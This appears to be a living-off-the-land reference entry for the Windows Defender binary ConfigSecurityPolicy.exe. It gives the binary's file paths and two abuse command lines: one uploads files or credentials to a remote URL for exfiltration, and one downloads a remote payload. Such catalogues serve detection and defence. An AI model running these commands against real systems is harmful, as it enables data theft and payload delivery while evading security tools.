ConfigSecurityPolicy.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Paths

  • C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

Commands

Upload

Upload file, credentials or data exfiltration in general

Use case: Upload file

Privileges: User

ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}

Download

It will download a remote payload and place it in INetCache.

Use case: Downloads payload from remote server

Privileges: User

ConfigSecurityPolicy.exe {REMOTEURL}

Detection

Resources